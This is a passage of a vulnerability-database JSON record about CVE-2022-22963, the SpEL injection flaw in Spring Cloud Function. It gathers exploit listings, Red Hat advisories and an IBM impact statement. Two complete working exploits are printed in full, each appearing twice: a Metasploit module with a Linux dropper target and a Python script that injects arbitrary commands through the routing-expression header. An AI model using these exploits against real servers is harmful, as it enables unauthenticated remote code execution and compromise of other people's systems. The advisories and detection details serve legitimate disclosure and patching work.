{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:36:15", "description": "# CVE-2022-22963 Exploit\nThis repository contains a Rust-based e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-10T14:12:58", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-31T19:48:01", "id": "6256CA70-58E5-5DE4-AB28-000166517607", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:24:34", "description": "# CVE-2022-22963 (spring cloud function sple rce)\n### spring clo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-07T15:57:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-06-05T02:13:29", "id": "72294700-E478-5397-A47A-6098D06CA60A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:25:35", "description": "# Exploit for RCE in Spring Cloud (CVE 2022-22963)\nExploit for *...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-25T19:50:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-25T19:54:23", "id": "BEC31AE7-B839-564C-9541-59368931D558", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:46", "description": "# Spring CVE\nThis includes CVE-2022-22963, a Spring SpEL / Expre...", "cvss3": {}, "published": "2022-03-31T20:19:51", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T07:36:29", "id": "6E5C078B-B2FA-520B-964A-D7055FD4EB0A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-01T02:33:23", "description": "# springhound\nCreated after the release of CVE-2022-22965 a...", "cvss3": {}, "published": "2022-04-01T00:34:29", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:47:30", "id": "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}], "zdt": [{"lastseen": "2023-07-21T18:40:34", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. 
Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "zdt", "title": "Spring Cloud Function SpEL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "1337DAY-ID-37565", "href": "https://0day.today/exploit/description/37565", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. 
By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for 
#{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://0day.today/exploit/37565", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-23T05:12:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-11T00:00:00", "type": "zdt", "title": "Spring Cloud 3.2.2 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], 
"modified": "2023-07-11T00:00:00", "id": "1337DAY-ID-38858", "href": "https://0day.today/exploit/description/38858", "sourceData": "# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)\n# Exploit Author: GatoGamer1155, 0bfxgh0st\n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/\n# Description: Exploit to execute commands exploiting CVE-2022-22963\n# Software Link: https://spring.io/projects/spring-cloud-function\n# CVE: CVE-2022-22963\n\nimport requests, argparse, json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True)\nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True)\nargs = parser.parse_args()\n\nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\")\n\nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command }\ndata = {\"data\": \"\"}\n\nrequest = requests.post(args.url, data=data, headers=headers)\nresponse = json.dumps(json.loads(request.text), indent=2)\nprint(response)\n", "sourceHref": "https://0day.today/exploit/38858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-08-16T15:27:36", "description": "Red Hat OpenShift Serverless Client kn 1.21.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.21.1. 
The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T07:34:16", "type": "redhat", "title": "(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:17:49", "id": "RHSA-2022:1291", "href": "https://access.redhat.com/errata/RHSA-2022:1291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "This version of the OpenShift Serverless Operator, which is supported on Red Hat OpenShift Container Platform versions 4.6, 4.7, 4.8, 4.9, and 4.10, includes a security fix. 
For more information, see the documentation listed in the References section.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T08:22:04", "type": "redhat", "title": "(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:22:15", "id": "RHSA-2022:1292", "href": "https://access.redhat.com/errata/RHSA-2022:1292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "New features and enhancements\n\n1. Verifying image signatures against Cosign public keys: You can use RHACS to ensure the integrity of the container images in your clusters by verifying image signatures against preconfigured keys. 
You can also create policies to block unsigned images and images that do not have a verified signature and enforce the policy by using an admission controller to stop unauthorized deployment creation. \n\n2. Registry integrations for Amazon Elastic Container Registry (ECR) are now automatically generated for Amazon Web Services (AWS) clusters. This feature requires that the nodes' Instance Identity and Access Management (IAM) Role has been granted access to ECR. You can turn off this feature by disabling the EC2 instance metadata service in your nodes. \n\n3. Identifying missing Kubernetes network policies: RHACS 3.70 ships with a new default policy that allows you to easily identify deployments that are not restricted by any ingress network policy and to trigger violation alerts accordingly. The default policy is named Deployments should have at least one ingress Network Policy. It is disabled by default. This default policy uses a new policy criterion called \"Alert on missing ingress Network Policy.\" To identify pod isolation gaps, you can clone this default policy or create a new one by using the policy criterion and enabling it on selected resources.\n\n4. A policy to detect the Spring Cloud Function RCE vulnerability [CVE-2022-22963] and the Spring Framework Spring4Shell RCE vulnerability [CVE-2022-22965] has been added. It has a severity level of Critical and is enabled by default.\n\n5. A new policy criterion has been added to validate the value of allowPrivilegeEscalation within the Kubernetes security context. You can use this policy criterion to provide alerts when a deployment is configured to allow a container process to gain more privileges than its parent process.\n\n6. Customers using the recommended Operator method to deploy RHACS on OpenShift Container Platform can now view the credentials for the admin user in the OpenShift Container Platform console. 
When viewing the Central object, the Details tab provides a clickable link to the credentials under Admin Password Secret Reference. The displayed credentials are the default generated password or a previously configured and stored custom secret.\n\n7. Previously, RHACS limited the number of allowed inclusion and exclusion scopes within a scope to ten each. This restriction has been removed.\n\nNotable technical changes\n\n1. Vulnerability scanning and reporting for RHCOS nodes: Vulnerability scanning and reporting for Red Hat Enterprise Linux CoreOS (RHCOS) nodes has been disabled until scanning improvements are made for improved accuracy and to support full host-level scanning beyond just Kubernetes components. Currently, RHCOS uses National Vulnerability Database (NVD) vulnerability data for reporting vulnerabilities for Kubernetes components from RHCOS. In the enhanced version, vulnerability reporting will be based on Red Hat published security data. (ROX-10662)\n\nDeprecated Features:\n\n- Ability to add comments to alerts and processes\n- Anchore, Tenable, and Docker Trusted registry integrations\n- External authorization plug-in for scoped access control\n- FROM option in the Disallowed Dockerfile line policy field\n- RenamePolicyCategory and DeletePolicyCategory API endpoints\n- --rhacs option for the roxctl helm output command\n\nRemoved Features:\n\n- Ability to delete default policies\n- Security policies without a policyVersion\n- /v1/policies API endpoint response: field response body parameter\n\nSecurity Fixes:\n\n* json-pointer: type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays (CVE-2021-23820)\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T02:02:58", "type": "redhat", "title": "(RHSA-2022:4880) Moderate: ACS 3.70 enhancement and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25032", "CVE-2020-7709", "CVE-2021-23222", "CVE-2021-23820", "CVE-2021-25219", "CVE-2021-3634", "CVE-2021-3672", "CVE-2021-3737", "CVE-2021-41190", "CVE-2021-4189", "CVE-2022-1154", "CVE-2022-1271", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-02T02:03:22", "id": "RHSA-2022:4880", "href": "https://access.redhat.com/errata/RHSA-2022:4880", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2023-07-12T16:34:20", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T00:00:00", "type": "packetstorm", "title": "Spring Cloud 3.2.2 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-12T00:00:00", "id": "PACKETSTORM:173430", "href": "https://packetstormsecurity.com/files/173430/Spring-Cloud-3.2.2-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) \n# Date: 07/07/2023 \n# Exploit Author: GatoGamer1155, 0bfxgh0st \n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/ \n# Description: Exploit to execute commands exploiting CVE-2022-22963 \n# Software Link: https://spring.io/projects/spring-cloud-function \n# CVE: CVE-2022-22963 \n \nimport requests, argparse, json \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True) \nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True) \nargs = parser.parse_args() \n \nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\") \n \nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command } \ndata = {\"data\": \"\"} \n \nrequest = requests.post(args.url, data=data, headers=headers) \nresponse = json.dumps(json.loads(request.text), indent=2) \nprint(response) \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/173430/springcloud322-exec.txt", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T17:01:15", "description": "", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "packetstorm", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "PACKETSTORM:166562", "href": "https://packetstormsecurity.com/files/166562/Spring-Cloud-Function-SpEL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Cloud Function SpEL Injection', \n'Description' => %q{ \nSpring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using \nan unsafe evaluation context with user-provided queries. By crafting a request to the application and setting \nthe spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code \nexecution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message. 
\n}, \n'Author' => [ \n'm09u3r', # vulnerability discovery \n'hktalent', # github PoC \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2022-22963'], \n['URL', 'https://github.com/hktalent/spring-spel-0day-poc'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'], \n['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225'] \n], \n'DisclosureDate' => '2022-03-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 8080, \n'TARGETURI' => '/functionRouter' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']) \n) \n \nreturn CheckCode::Unknown unless res \n \n# both vulnerable and patched servers respond with 500 and a JSON body with these keys \nreturn CheckCode::Safe unless res.code == 500 \nreturn CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set) \n \n# best we can do is detect that the service is running \nCheckCode::Detected \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_request_cgi( \n'method' => 
'POST', \n'uri' => normalize_uri(datastore['TARGETURI']), \n'headers' => { \n'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\" \n} \n) \n \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \nfail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166562/spring_cloud_function_spel_injection.rb.txt"}], "ibm": [{"lastseen": "2023-06-24T06:01:42", "description": "## Abstract\n\nIs Sterling Order Management affected by Spring vulnerability CVE-2022-22963?\n\n## Content\n\nIBM is aware of a recently surfaced vulnerability [CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>) and has evaluated whether any Sterling Order Management applications are affected. The following is a summary of our evaluation:\n\nComponent | \n\nSpring \nversion\n\nused\n\n| Impacted by \nCVE-2022-22963 | \n\nImmediate\n\nMitigation\n\nPlan\n\n| Latest Status \n---|---|---|---|--- \nSterling Order Management SaaS, On-prem and Certified Containers (including Store Engagement & Call Center) | Not used | No | N/A | Not vulnerable \n \nInventory Visibility\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \n \nIntelligent Promising\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOMS Data Exchange Service | Not used | No | N/A | Not vulnerable \n \nStore Inventory Management\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOrder Hub | Not used | No | N/A | Not vulnerable \nSterling Fulfillment Optimizer | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Omni-Configurator and Visual Modeler | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Field Sales | Not used | No | N/A | Not vulnerable \n \n## Related Information 
